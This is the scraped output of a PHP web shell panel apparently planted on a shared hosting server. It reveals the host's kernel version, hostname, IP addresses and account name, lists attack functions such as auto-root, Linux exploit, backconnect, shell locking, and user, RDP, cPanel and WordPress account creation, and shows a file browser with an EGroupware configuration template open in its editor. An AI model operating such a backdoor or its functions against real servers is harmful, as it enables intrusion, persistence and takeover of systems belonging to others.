Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.147.51.75
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
egroup /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
1.07
KB
-rw-r--r--
clone.php
6.19
KB
-rw-r--r--
data.zip
320
B
-rw-r--r--
edit.php
4.21
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
egroup.sql
269.71
KB
-rw-r--r--
egroup.zip
157.06
MB
-rw-r--r--
fileindex.php
764
B
-rw-r--r--
header.inc.php
3.36
KB
-rw-r--r--
import.php
3.78
KB
-rw-r--r--
info.xml
3.09
KB
-rw-r--r--
install.js
1.25
KB
-rw-r--r--
install.php
5.97
KB
-rw-r--r--
install.xml
2.69
KB
-rw-r--r--
md5
3.51
KB
-rw-r--r--
notes.txt
1.38
KB
-rw-r--r--
upgrade.php
5.65
KB
-rw-r--r--
upgrade.xml
292
B
-rw-r--r--
vendor1.zip
17.57
MB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.inc.php
<?php /** * EGroupware - configuration file * * Use EGroupware's setup to create or edit this configuration file. * You do NOT need to copy and edit this file manually! * * @link http://www.egroupware.org * @license http://opensource.org/licenses/gpl-license.php GPL - GNU General Public License * @author RalfBecker@outdoor-training.de * (This file was originaly written by Dan Kuykendall) * @version $Id$ */ // eGW install dir, need to be changed if you copy the server to an other directory define('EGW_SERVER_ROOT','[[softpath]]'); // other pathes depending on the one above define('EGW_INCLUDE_ROOT',EGW_SERVER_ROOT); define('EGW_API_INC',EGW_INCLUDE_ROOT.'/phpgwapi/inc'); // who is allowed to make changes to THIS config file via eGW's setup $GLOBALS['egw_info']['server']['header_admin_user'] = '[[admin_username]]'; $GLOBALS['egw_info']['server']['header_admin_password'] = '[[config_pass]]'; // restrict the access to setup to certain (comma separated) IPs or domains $GLOBALS['egw_info']['server']['setup_acl'] = ''; /* eGroupWare domain-specific db settings */ $GLOBALS['egw_domain']['default'] = array( 'db_host' => '[[softdbhost]]', 'db_port' => '3306', 'db_name' => '[[softdb]]', 'db_user' => '[[softdbuser]]', 'db_pass' => '[[softdbpass]]', // Look at the README file 'db_type' => 'mysqli', // This will limit who is allowed to make configuration modifications 'config_user' => '[[cadmin_username]]', 'config_passwd' => '[[cconfig_pass]]' ); /* ** If you want to have your domains in a select box, change to True ** If not, users will have to login as user@domain ** Note: This is only for virtual domain support, default domain users (that's everyone ** form the first domain or if you have only one) can login only using just there loginid. */ $GLOBALS['egw_info']['server']['show_domain_selectbox'] = false; $GLOBALS['egw_info']['server']['db_persistent'] = true; /* This is used to control mcrypt's use */ $GLOBALS['egw_info']['server']['mcrypt_enabled'] = false; /* ** This is a random string used as the initialization vector for mcrypt ** feel free to change it when setting up eGrouWare on a clean database, ** but you must not change it after that point! ** It should be around 30 bytes in length. */ $GLOBALS['egw_info']['server']['mcrypt_iv'] = '[[mcrypt]]'; $GLOBALS['egw_info']['flags']['page_start_time'] = microtime(true); include(EGW_SERVER_ROOT.'/api/setup/setup.inc.php'); $GLOBALS['egw_info']['server']['versions'] = $setup_info['api']['versions']; $GLOBALS['egw_info']['server']['versions']['phpgwapi'] = $GLOBALS['egw_info']['server']['versions']['api'] = $setup_info['api']['version']; unset($setup_info); $GLOBALS['egw_info']['server']['versions']['header'] = '1.29'; if(!isset($GLOBALS['egw_info']['flags']['noapi']) || !$GLOBALS['egw_info']['flags']['noapi']) { if (substr($_SERVER['SCRIPT_NAME'],-7) != 'dav.php' && // dont do it for webdav/groupdav, as we can not safely switch it off again (!isset($_GET['menuaction']) || substr($_GET['menuaction'],-10) != '_hooks.log') && substr($_SERVER['SCRIPT_NAME'],-10) != '/share.php') { ob_start(); // to prevent error messages to be send before our headers } require_once(EGW_SERVER_ROOT.'/api/src/loader.php'); } else { require_once(EGW_SERVER_ROOT.'/api/src/loader/common.php'); } /* Leave off the final php closing tag, some editors will add a \n or space after which will mess up cookies later on */
Close